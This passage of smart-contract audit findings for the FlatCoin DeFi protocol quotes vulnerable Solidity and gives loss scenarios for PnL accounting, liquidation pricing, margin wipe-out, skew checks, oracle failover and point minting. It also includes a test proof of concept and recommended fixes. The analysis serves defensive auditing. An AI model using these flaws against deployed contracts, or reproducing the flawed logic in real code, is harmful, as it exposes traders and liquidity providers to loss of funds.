._getPositionSummary({position: position, nextFundingEntry: cumulativeFunding, price: adjustPrice})\\n .marginAfterSettlement).toUint256();\\n..SNIP..\\n vault.setPosition(\\n FlatcoinStructs.Position({\\n lastPrice: adjustPrice,\\n marginDeposited: newMargin,\\n additionalSize: newAdditionalSize,\\n entryCumulativeFunding: cumulativeFunding\\n }),\\n announcedAdjust.tokenId\\n );\\n```\\n\\nAt $T2$, the price of rETH increases from $500 to $2000. Thus, Bob's PnL is as follows:\\n```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $500) / $2000\\nPnL = $60000 / $2000 = 30 rETH\\n```\\n\\nAt this point, the position's `marginDeposited` will be $(x - 40 + 30)\\ rETH$, which is equal to $(x - 10)\\ rETH$. This effectively means that Bob has lost 10 rETH of the total margin he deposited.\\nImportant Note 2: In terms of dollars, each ETH gains $1500. Since the position held 40 ETH, the position gained $60000.\\nImportant Note 3: If we add up the loss of $20000 at $T1$ and the gain of $60000 at $T2$, the overall PnL is a gain of $40000 at the end.\\nAnalysis\\nThe final PnL of a position should be equivalent regardless of the number of adjustments/position updates made between $T0$ and $T2$. However, the current implementation does not conform to this property. Bob gains 20 rETH in the first scenario, while Bob loses 10 rETH in the second scenario.\\nThere are several reasons that lead to this issue:\\nThe PnL calculation emphasizes relative price changes (percentage) rather than absolute price changes (dollar value). 
This leads to asymmetric rETH outcomes for the same absolute dollar gains/losses. If we had used dollars to compute the PnL, both scenarios would return the same correct result, with a gain of $40000 at the end, as shown in the examples above. (Refer to the important notes above.)\\nThe formula for PnL calculation is sensitive to the proportion of the price change relative to the current price. This causes the rETH gains/losses to be non-linear even when the absolute dollar gains/losses are the same.\\nExtra Example\\nThe current approach to computing the PnL will also cause issues in another area besides the one shown above. The following example aims to demonstrate that it can cause a desync between the PnL accumulated by the global positions AND the PnL of all the individual open positions in the system.\\nThe following shows the two open positions owned by Alice and Bob. The current price of ETH is $1000 and the current time is $T0$.\\nAlice's Long Position: Position Size = 100 ETH, Entry Price = $1000\\nBob's Long Position: Position Size = 50 ETH, Entry Price = $1000\\nAt $T1$, the price of ETH drops from $1000 to $750, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 50 ETH.\\n```\\npriceShift = $750 - $1000 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $750 = -50 ETH\\n```\\n\\nAt $T2$, the price of ETH drops from $750 to $500, and the `updateGlobalPositionData` function is executed. The `profitLossTotal` is computed as below. Thus, the `marginDepositedTotal` decreased by 75 ETH.\\n```\\npriceShift = $500 - $750 = -$250\\nprofitLossTotal = (globalPosition.sizeOpenedTotal * priceShift) / price\\nprofitLossTotal = (150 ETH * -$250) / $500 = -75 ETH\\n```\\n\\nIn total, the `marginDepositedTotal` decreased by 125 ETH (50 + 75), which means that the long traders lost 125 ETH from $T0$ to $T2$.\\nHowever, when we compute the loss of Alice and Bob's positions at $T2$, they lost a total of 150 ETH, which deviates from the loss of 125 ETH in the global position data.\\n```\\nAlice's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (100 ETH * -$500) / $500 = -100 ETH\\n\\nBob's PNL\\npriceShift = current price - entry price = $500 - $1000 = -$500\\nPnL = (position size * priceShift) / current price\\nPnL = (50 ETH * -$500) / $500 = -50 ETH\\n```\\n
Consider tracking the PnL in dollar terms to ensure consistency between the rETH and dollar representations of gains and losses.\\nAppendix\\nIn comparison, SNX V2 is not vulnerable to this issue. The reason is that when SNX V2 computes the PnL, it does not "scale" the result down by the price. The PnL in SNX V2 is simply computed in dollar value ($positionSize \\times priceShift$), while the FlatCoin protocol computes it in collateral (rETH) terms ($\\frac{positionSize \\times priceShift}{price}$).\\n```\\nfunction _profitLoss(Position memory position, uint price) internal pure returns (int pnl) {\\n int priceShift = int(price).sub(int(position.lastPrice));\\n return int(position.size).multiplyDecimal(priceShift);\\n}\\n```\\n\\n```\\n/*\\n * The initial margin of a position, plus any PnL and funding it has accrued. The resulting value may be negative.\\n */\\nfunction _marginPlusProfitFunding(Position memory position, uint price) internal view returns (int) {\\n int funding = _accruedFunding(position, price);\\n return int(position.margin).add(_profitLoss(position, price)).add(funding);\\n}\\n```\\n
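A minimal illustration of the dollar-denominated approach (an assumption about how it could be structured, not the protocol's implementation): track each position's PnL in dollars, mirroring the SNX V2 style above, and convert to collateral units only once at settlement.\\n```\\n// PnL in dollar terms (18 decimals); independent of the price level at which it is evaluated.\\nfunction _profitLossUsd(FlatcoinStructs.Position memory position, uint256 price) internal pure returns (int256) {\\n int256 priceShift = int256(price) - int256(position.lastPrice);\\n return (int256(position.additionalSize) * priceShift) / 1e18;\\n}\\n\\n// Convert the accumulated dollar PnL into rETH only at settlement time.\\nfunction _pnlInCollateral(int256 pnlUsd, uint256 settlementPrice) internal pure returns (int256) {\\n return (pnlUsd * 1e18) / int256(settlementPrice);\\n}\\n```\\n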
Loss of assets, as demonstrated in the second scenario in the first example above. The tracking of profit and loss, which is the key component within the protocol, both on the position level and global level, is broken.
```\\nPnL = Position Size * Price Shift / Current Price\\nPnL = Position Size * (Current Price - Last Price) / Current Price\\nPnL = 40 rETH * ($2000 - $1000) / $2000\\nPnL = $40000 / $2000 = 20 rETH\\n```\\n
Incorrect price used when updating the global position data
high
Incorrect price used when updating the global position data leading to a loss of assets for LPs.\\nNear the end of the liquidation process, the `updateGlobalPositionData` function at Line 159 will be executed to update the global position data. However, when executing the `updateGlobalPositionData` function, the code sets the price at Line 160 below to the position's last price (position.lastPrice), which is incorrect. The price should be set to the current price instead, and not the position's last price.\\n```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n\\nThe reason why the `updateGlobalPositionData` function expects a current price to be passed in is that within the `PerpMath._profitLossTotal` function, it will compute the price shift between the current price and the last price to obtain the PnL of all the open positions. Also, per the comment at Line 170 below, it expects the current price of the collateral to be passed in.\\nThus, it is incorrect to pass in the individual position's last/entry price, which is usually the price of the collateral when the position was first opened or adjusted some time ago.\\nThus, if the last/entry price of the liquidated position is higher than the current price of collateral, the PnL will be inflated, indicating more gain for the long traders. 
Since this is a zero-sum game, this also means that the LP loses more assets than expected due to the inflated gain of the long traders.\\n```\\nFile: FlatcoinVault.sol\\n /// @notice Function to update the global position data.\\n /// @dev This function is only callable by the authorized modules.\\n /// @param _price The current price of the underlying asset.\\n /// @param _marginDelta The change in the margin deposited total.\\n /// @param _additionalSizeDelta The change in the size opened total.\\n function updateGlobalPositionData(\\n uint256 _price,\\n int256 _marginDelta,\\n int256 _additionalSizeDelta\\n ) external onlyAuthorizedModule {\\n // Get the total profit loss and update the margin deposited total.\\n int256 profitLossTotal = PerpMath._profitLossTotal({globalPosition: _globalPositions, price: _price});\\n\\n // Note that technically, even the funding fees should be accounted for when computing the margin deposited total.\\n // However, since the funding fees are settled at the same time as the global position data is updated,\\n // we can ignore the funding fees here.\\n int256 newMarginDepositedTotal = int256(_globalPositions.marginDepositedTotal) + _marginDelta + profitLossTotal;\\n\\n // Check that the sum of margin of all the leverage traders is not negative.\\n // Rounding errors shouldn't result in a negative margin deposited total given that\\n // we are rounding down the profit loss of the position.\\n // If anything, after closing the last position in the system, the `marginDepositedTotal` should can be positive.\\n // The margin may be negative if liquidations are not happening in a timely manner.\\n if (newMarginDepositedTotal < 0) {\\n revert FlatcoinErrors.InsufficientGlobalMargin();\\n }\\n\\n _globalPositions = FlatcoinStructs.GlobalPositions({\\n marginDepositedTotal: uint256(newMarginDepositedTotal),\\n sizeOpenedTotal: (int256(_globalPositions.sizeOpenedTotal) + _additionalSizeDelta).toUint256(),\\n lastPrice: _price\\n });\\n```\\n
Use the current price instead of liquidated position's last price when update the global position data\\n```\\n(uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n..SNIP..\\nvault.updateGlobalPositionData({\\n// Remove the line below\\n price: position.lastPrice,\\n// Add the line below\\n price: currentPrice, \\n marginDelta: // Remove the line below\\n(int256(position.marginDeposited) // Add the line below\\n positionSummary.accruedFunding),\\n additionalSizeDelta: // Remove the line below\\nint256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n});\\n```\\n
Loss of assets for the LP as mentioned in the above section.
```\\nFile: LiquidationModule.sol\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n\\n (uint256 currentPrice, ) = IOracleModule(vault.moduleAddress(FlatcoinModuleKeys._ORACLE_MODULE_KEY)).getPrice();\\n\\n // Settle funding fees accrued till now.\\n vault.settleFundingFees();\\n\\n // Check if the position can indeed be liquidated.\\n if (!canLiquidate(tokenId)) revert FlatcoinErrors.CannotLiquidate(tokenId);\\n\\n FlatcoinStructs.PositionSummary memory positionSummary = PerpMath._getPositionSummary(\\n position,\\n vault.cumulativeFundingRate(),\\n currentPrice\\n );\\n..SNIP..\\n vault.updateGlobalPositionData({\\n price: position.lastPrice,\\n marginDelta: -(int256(position.marginDeposited) + positionSummary.accruedFunding),\\n additionalSizeDelta: -int256(position.additionalSize) // Since position is being closed, additionalSizeDelta should be negative.\\n });\\n```\\n
Long trader's deposited margin can be wiped out
high
Long traders' deposited margin can be wiped out due to a logic error, leading to a loss of assets.\\n```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n\\nIssue 1\\nAssume that there are two long positions in the system and the `_globalPositions.marginDepositedTotal` is $X$.\\nAssume that the funding fees accrued to the long positions at Line 228 are $Y$. $Y$ is a positive value indicating the overall gain/profit that the long traders received from the LPs.\\nIn this case, the `_globalPositions.marginDepositedTotal` should be set to $(X + Y)$ after taking into consideration the funding fee gain/profit accrued by the long positions.\\nHowever, in this scenario, $X < Y$. Thus, the condition at Line 232 will be evaluated as `false`, and the `_globalPositions.marginDepositedTotal` will be set to zero. This effectively wipes out all the margin collateral deposited by the long traders in the system, and the deposited margin of the long traders is lost.\\nIssue 2\\nThe second issue with the current implementation is that it does not accurately capture scenarios where the addition of `_globalPositions.marginDepositedTotal` and `_fundingFees` results in a negative number. This is because `_fundingFees` could be a large negative number that, when added to `_globalPositions.marginDepositedTotal`, results in a negative total, but the condition at Line 232 above still evaluates as true, resulting in an underflow revert.
If the intention is to ensure that `_globalPositions.marginDepositedTotal` will never become negative, consider summing up $(X + Y)$ first and determining if the result is less than zero. If yes, set the `_globalPositions.marginDepositedTotal` to zero.\\nThe following is the pseudocode:\\n```\\nnewMarginTotal = globalPositions.marginDepositedTotal + _fundingFees;\\nglobalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n```\\n
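Expanded into Solidity, a sketch of that pseudocode inside `settleFundingFees()` (field names follow the snippet quoted in the description):\\n```\\n_fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n// Sum first, then clamp: the total is zeroed only when the combined value is actually negative,\\n// so a funding gain larger than the current total no longer wipes out the longs' margin.\\nint256 newMarginTotal = int256(_globalPositions.marginDepositedTotal) + _fundingFees;\\n_globalPositions.marginDepositedTotal = newMarginTotal > 0 ? uint256(newMarginTotal) : 0;\\n\\n_updateStableCollateralTotal(-_fundingFees);\\n```\\n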
Loss of assets for the long traders as mentioned above.
```\\nFile: FlatcoinVault.sol\\n function settleFundingFees() public returns (int256 _fundingFees) {\\n..SNIP..\\n // Calculate the funding fees accrued to the longs.\\n // This will be used to adjust the global margin and collateral amounts.\\n _fundingFees = PerpMath._accruedFundingTotalByLongs(_globalPositions, unrecordedFunding);\\n\\n // In the worst case scenario that the last position which remained open is underwater,\\n // we set the margin deposited total to 0. We don't want to have a negative margin deposited total.\\n _globalPositions.marginDepositedTotal = (int256(_globalPositions.marginDepositedTotal) > _fundingFees)\\n ? uint256(int256(_globalPositions.marginDepositedTotal) + _fundingFees)\\n : 0;\\n\\n _updateStableCollateralTotal(-_fundingFees);\\n```\\n
Fees are ignored when checking the max skew in Stable Withdrawal / Leverage Open / Leverage Adjust
medium
Fees are ignored when checking the max skew in Stable Withdrawal / Leverage Open / Leverage Adjust.\\nWhen a user withdraws from the stable LP, the vault's total stable collateral is updated:\\n```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n\\nThen `_withdrawFee` is calculated and the checkSkewMax(...) function is called to ensure that the system will not be too skewed towards longs:\\n```\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n```\\n\\nAt the end of the execution, the vault collateral is settled again with withdrawFee, the keeper receives keeperFee, and `(amountOut - totalFee)` collateral is transferred to the user:\\n```\\n // include the fees here to check for slippage\\n amountOut -= totalFee;\\n\\n if (amountOut < stableWithdraw.minAmountOut)\\n revert FlatcoinErrors.HighSlippage(amountOut, stableWithdraw.minAmountOut);\\n\\n // Settle the collateral\\n vault.updateStableCollateralTotal(int256(withdrawFee)); // pay the withdrawal fee to stable LPs\\n vault.sendCollateral({to: msg.sender, amount: order.keeperFee}); // pay the keeper their fee\\n vault.sendCollateral({to: account, amount: amountOut}); // transfer remaining amount to the trader\\n```\\n\\nThe `totalFee` is composed of the keeper fee and the withdrawal fee:\\n```\\n uint256 totalFee = order.keeperFee + withdrawFee;\\n```\\n\\nThis means the withdrawal fee is still in the vault; however, this fee is ignored when checking the max skew, so the protocol may revert on a safe withdrawal. Consider the following scenario:\\nskewFractionMax is `120%` and stableWithdrawFee is 1%;\\nAlice deposits `100` collateral and Bob opens a leverage position with size 100;\\nAt this moment, there is `100` collateral in the Vault, the skew is `0` and the skew fraction is 100%;\\nAlice tries to withdraw `16.8` collateral, withdrawFee is `0.168`; after the withdrawal, it is expected that there is `83.368` stable collateral in the Vault, so skewFraction should be about `119.95%`, which is less than skewFractionMax;\\nHowever, the withdrawal will actually fail because when the protocol checks the max skew, withdrawFee is ignored and the skewFraction turns out to be `120.19%`, which is higher than skewFractionMax.\\nThe same issue may occur when the protocol executes a leverage open or a leverage adjust; in both executions, tradeFee is ignored when checking the max skew.\\nPlease see the test code:\\n```\\n function test_audit_withdraw_fee_ignored_when_checks_skew_max() public {\\n // skewFractionMax is 120%\\n uint256 skewFractionMax = vaultProxy.skewFractionMax();\\n assertEq(skewFractionMax, 120e16);\\n\\n // withdraw fee is 1%\\n vm.prank(vaultProxy.owner());\\n stableModProxy.setStableWithdrawFee(1e16);\\n\\n uint256 collateralPrice = 1000e8;\\n\\n uint256 depositAmount = 100e18;\\n announceAndExecuteDeposit({\\n traderAccount: alice,\\n keeperAccount: keeper,\\n depositAmount: depositAmount,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n uint256 additionalSize = 100e18;\\n announceAndExecuteLeverageOpen({\\n traderAccount: bob,\\n keeperAccount: keeper,\\n margin: 50e18,\\n additionalSize: 100e18,\\n oraclePrice: collateralPrice,\\n keeperFeeAmount: 0\\n });\\n\\n // After leverage Open, skew is 0\\n int256 skewAfterLeverageOpen = vaultProxy.getCurrentSkew();\\n assertEq(skewAfterLeverageOpen, 0);\\n // skew fraction is 100%\\n uint256 skewFractionAfterLeverageOpen = 
getLongSkewFraction();\\n assertEq(skewFractionAfterLeverageOpen, 1e18);\\n\\n // Note: comment out `vault.checkSkewMax({additionalSkew: 0})` and below lines to see the actual skew fraction\\n // Alice withdraws 16.8 collateral\\n // uint256 aliceLpBalance = stableModProxy.balanceOf(alice);\\n // announceAndExecuteWithdraw({\\n // traderAccount: alice, \\n // keeperAccount: keeper, \\n // withdrawAmount: 168e17, \\n // oraclePrice: collateralPrice, \\n // keeperFeeAmount: 0\\n // });\\n\\n // // After withdrawal, the actual skew fraction is 119.9%, less than skewFractionMax\\n // uint256 skewFactionAfterWithdrawal = getLongSkewFraction();\\n // assertEq(skewFactionAfterWithdrawal, 1199501007580846367);\\n\\n // console2.log(WETH.balanceOf(address(vaultProxy)));\\n }\\n```\\n
Include the withdrawal fee / trade fee when checking the max skew.
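A minimal sketch of one possible fix against the withdrawal flow quoted above (names mirror the snippets; if the fee is credited here, the later `vault.updateStableCollateralTotal(int256(withdrawFee))` settlement in the order-execution code would have to be removed to avoid double counting):\\n```\\n// Apply the withdraw fee if it's not the final withdrawal.\\n_withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n// Credit the fee to the stable LPs *before* the skew check so checkSkewMax sees the\\n// collateral that actually stays in the vault.\\nvault.updateStableCollateralTotal(int256(_withdrawFee));\\n\\n// additionalSkew = 0 because the withdrawal itself was already processed above.\\nvault.checkSkewMax({additionalSkew: 0});\\n```\\n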
The protocol may wrongly prevent a Stable Withdrawal / Leverage Open / Leverage Adjust even though the execution is essentially safe.
```\\n vault.updateStableCollateralTotal(-int256(_amountOut));\\n```\\n
In LeverageModule.executeOpen/executeAdjust, vault.checkSkewMax should be called after updating the global position data
medium
```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n\\nWhen `profitLossTotal` is a positive value, `stableCollateralTotal` will decrease.\\nWhen `profitLossTotal` is a negative value, `stableCollateralTotal` will increase.\\nAssume the following:\\n```\\nstableCollateralTotal = 90e18\\n_globalPositions = { \\n sizeOpenedTotal: 100e18, \\n lastPrice: 1800e18, \\n}\\nA new position is to be opened with additionalSize = 5e18. \\nfresh price=2000e18\\n```\\n\\nWe illustrate this with two situations:\\n`checkSkewMax` is called before `updateGlobalPositionData`.\\n```\\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 90e18 \\n = 1.16667e18 < skewFractionMax(1.2e18)\\nso the checkSkewMax check passes.\\n```\\n\\n`checkSkewMax` is called after `updateGlobalPositionData`.\\n```\\nIn updateGlobalPositionData: \\nPerpMath._profitLossTotal calculates\\nprofitLossTotal = _globalPositions.sizeOpenedTotal * (int256(price) - int256(globalPosition.lastPrice)) / int256(price) \\n = 100e18 * (2000e18 - 1800e18) / 2000e18 = 100e18 * 200e18 /2000e18 \\n = 10e18 \\n_updateStableCollateralTotal(-profitLossTotal) will deduct 10e18 from stableCollateralTotal. \\nso stableCollateralTotal = 90e18 - 10e18 = 80e18. \\n\\nNow, checkSkewMax is called: \\nlongSkewFraction = (_globalPositions.sizeOpenedTotal + additionalSize) * 1e18 / stableCollateralTotal \\n = (100e18 + 5e18) * 1e18 / 80e18 \\n = 1.3125e18 > skewFractionMax(1.2e18)\\n```\\n\\nTherefore, this new position should not be allowed to be opened, as it only makes the system more skewed towards the long side.
```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:--- vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n+++ vault.checkSkewMax(0); //0 means that vault.updateGlobalPositionData has added announcedOpen.additionalSize.\\n// rest of code// rest of code\\n }\\n```\\n
The `stableCollateralTotal` used by `checkSkewMax` is a stale value that has not yet had the pending profit and loss settled against it. As a result, when the price of the collateral rises, the system can become more skewed towards the long side than `skewFractionMax` allows.
```\\nFile: flatcoin-v1\\src\\LeverageModule.sol\\n function executeOpen(\\n address _account,\\n address _keeper,\\n FlatcoinStructs.Order calldata _order\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _newTokenId) {\\n// rest of code// rest of code\\n101:-> vault.checkSkewMax({additionalSkew: announcedOpen.additionalSize});\\n\\n {\\n // The margin change is equal to funding fees accrued to longs and the margin deposited by the trader.\\n105:-> vault.updateGlobalPositionData({\\n price: entryPrice,\\n marginDelta: int256(announcedOpen.margin),\\n additionalSizeDelta: int256(announcedOpen.additionalSize)\\n });\\n// rest of code// rest of code\\n }\\n```\\n
Oracle will not failover as expected during liquidation
medium
Oracle will not failover as expected during liquidation. If the liquidation cannot be executed due to the revert described in the following scenario, underwater positions and bad debt accumulate in the protocol, threatening the solvency of the protocol.\\nThe liquidators have the option to update the Pyth price during liquidation. If the liquidators do not intend to update the Pyth price during liquidation, they have to call the second `liquidate(uint256 tokenId)` function at Line 85 below directly, which does not have the `updatePythPrice` modifier.\\n```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n\\nIt was understood from the protocol team that the rationale for allowing the liquidators to execute a liquidation without updating the Pyth price is to ensure that the liquidations will work regardless of Pyth's working status, in which case Chainlink is the fallback, and the last oracle price will be used for the liquidation.\\nHowever, upon further review, it was found that the fallback mechanism within the FlatCoin protocol does not work as expected by the protocol team.\\nAssume that Pyth is down. In this case, no one would be able to fetch the latest off-chain price from Pyth network and update Pyth on-chain contract. As a result, the prices stored in the Pyth on-chain contract will become outdated and stale.\\nWhen liquidation is executed in FlatCoin protocol, the following `_getPrice` function will be executed to fetch the price. Line 107 below will fetch the latest price from Chainlink, while Line 108 below will fetch the last available price on the Pyth on-chain contract. When the Pyth on-chain prices have not been updated for a period of time, the deviation between `onchainPrice` and `offchainPrice` will widen till a point where `diffPercent > maxDiffPercent` and a revert will occur at Line 113 below, thus blocking the liquidation from being carried out. 
As a result, the liquidation mechanism within the FlatCoin protocol will stop working.\\nAlso, the protocol team's goal of allowing the liquidators to execute a liquidation without updating the Pyth price to ensure that the liquidations will work regardless of Pyth's working status will not be achieved.\\n```\\nFile: OracleModule.sol\\n /// @notice Returns the latest 18 decimal price of asset from either Pyth.network or Chainlink.\\n /// @dev It verifies the Pyth network price against Chainlink price (ensure that it is within a threshold).\\n /// @return price The latest 18 decimal price of asset.\\n /// @return timestamp The timestamp of the latest price.\\n function _getPrice(uint32 maxAge) internal view returns (uint256 price, uint256 timestamp) {\\n (uint256 onchainPrice, uint256 onchainTime) = _getOnchainPrice(); // will revert if invalid\\n (uint256 offchainPrice, uint256 offchainTime, bool offchainInvalid) = _getOffchainPrice();\\n bool offchain;\\n\\n uint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\n uint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\n if (diffPercent > maxDiffPercent) revert FlatcoinErrors.PriceMismatch(diffPercent);\\n\\n if (offchainInvalid == false) {\\n // return the freshest price\\n if (offchainTime >= onchainTime) {\\n price = offchainPrice;\\n timestamp = offchainTime;\\n offchain = true;\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n } else {\\n price = onchainPrice;\\n timestamp = onchainTime;\\n }\\n\\n // Check that the timestamp is within the required age\\n if (maxAge < type(uint32).max && timestamp + maxAge < block.timestamp) {\\n revert FlatcoinErrors.PriceStale(\\n offchain ? FlatcoinErrors.PriceSource.OffChain : FlatcoinErrors.PriceSource.OnChain\\n );\\n }\\n }\\n```\\n
Consider implementing a feature that allows the protocol team to disable the price deviation check in the event that the Pyth network is down for an extended period of time.
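A minimal sketch of such an escape hatch in `OracleModule._getPrice()`; the flag name, setter, and `onlyOwner` guard are assumptions standing in for whatever access control the module actually uses:\\n```\\nbool public priceDeviationCheckDisabled; // assumed flag, not part of the current module\\n\\nfunction setPriceDeviationCheckDisabled(bool _disabled) external onlyOwner {\\n    priceDeviationCheckDisabled = _disabled;\\n}\\n\\n// Inside _getPrice(): skip the revert only when the check is explicitly disabled.\\nuint256 priceDiff = (int256(onchainPrice) - int256(offchainPrice)).abs();\\nuint256 diffPercent = (priceDiff * 1e18) / onchainPrice;\\nif (!priceDeviationCheckDisabled && diffPercent > maxDiffPercent) {\\n    revert FlatcoinErrors.PriceMismatch(diffPercent);\\n}\\n```\\n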
The liquidation mechanism is a core component of the protocol and is critical to its solvency. If liquidations cannot be executed due to the revert described in the above scenario, underwater positions and bad debt accumulate in the protocol, threatening its solvency.
```\\nFile: LiquidationModule.sol\\n function liquidate(\\n uint256 tokenID,\\n bytes[] calldata priceUpdateData\\n ) external payable whenNotPaused updatePythPrice(vault, msg.sender, priceUpdateData) {\\n liquidate(tokenID);\\n }\\n\\n /// @notice Function to liquidate a position.\\n /// @dev One could directly call this method instead of `liquidate(uint256, bytes[])` if they don't want to update the Pyth price.\\n /// @param tokenId The token ID of the leverage position.\\n function liquidate(uint256 tokenId) public nonReentrant whenNotPaused liquidationInvariantChecks(vault, tokenId) {\\n FlatcoinStructs.Position memory position = vault.getPosition(tokenId);\\n```\\n
Large amounts of points can be minted virtually without any cost
medium
Large amounts of points can be minted virtually without any cost. The points are intended to be used to exchange something of value. A malicious user could abuse this to obtain a large number of points, which could obtain excessive value and create unfairness among other protocol users.\\nWhen depositing stable collateral, the LPs only need to pay for the keeper fee. The keeper fee will be sent to the caller who executed the deposit order.\\nWhen withdrawing stable collateral, the LPs need to pay for the keeper fee and withdraw fee. However, there is an instance where one does not need to pay for the withdrawal fee. Per the condition at Line 120 below, if the `totalSupply` is zero, this means that it is the final/last withdrawal. In this case, the withdraw fee will not be applicable and remain at zero.\\n```\\nFile: StableModule.sol\\n function executeWithdraw(\\n address _account,\\n uint64 _executableAtTime,\\n FlatcoinStructs.AnnouncedStableWithdraw calldata _announcedWithdraw\\n ) external whenNotPaused onlyAuthorizedModule returns (uint256 _amountOut, uint256 _withdrawFee) {\\n uint256 withdrawAmount = _announcedWithdraw.withdrawAmount;\\n..SNIP..\\n _burn(_account, withdrawAmount);\\n..SNIP..\\n // Check that there is no significant impact on stable token price.\\n // This should never happen and means that too much value or not enough value was withdrawn.\\n if (totalSupply() > 0) {\\n if (\\n stableCollateralPerShareAfter < stableCollateralPerShareBefore - 1e6 ||\\n stableCollateralPerShareAfter > stableCollateralPerShareBefore + 1e6\\n ) revert FlatcoinErrors.PriceImpactDuringWithdraw();\\n\\n // Apply the withdraw fee if it's not the final withdrawal.\\n _withdrawFee = (stableWithdrawFee * _amountOut) / 1e18;\\n\\n // additionalSkew = 0 because withdrawal was already processed above.\\n vault.checkSkewMax({additionalSkew: 0});\\n } else {\\n // Need to check there are no longs open before allowing full system withdrawal.\\n uint256 sizeOpenedTotal = vault.getVaultSummary().globalPositions.sizeOpenedTotal;\\n\\n if (sizeOpenedTotal != 0) revert FlatcoinErrors.MaxSkewReached(sizeOpenedTotal);\\n if (stableCollateralPerShareAfter != 1e18) revert FlatcoinErrors.PriceImpactDuringFullWithdraw();\\n }\\n```\\n\\nWhen LPs deposit rETH and mint UNIT, the protocol will mint points to the depositor's account as per Line 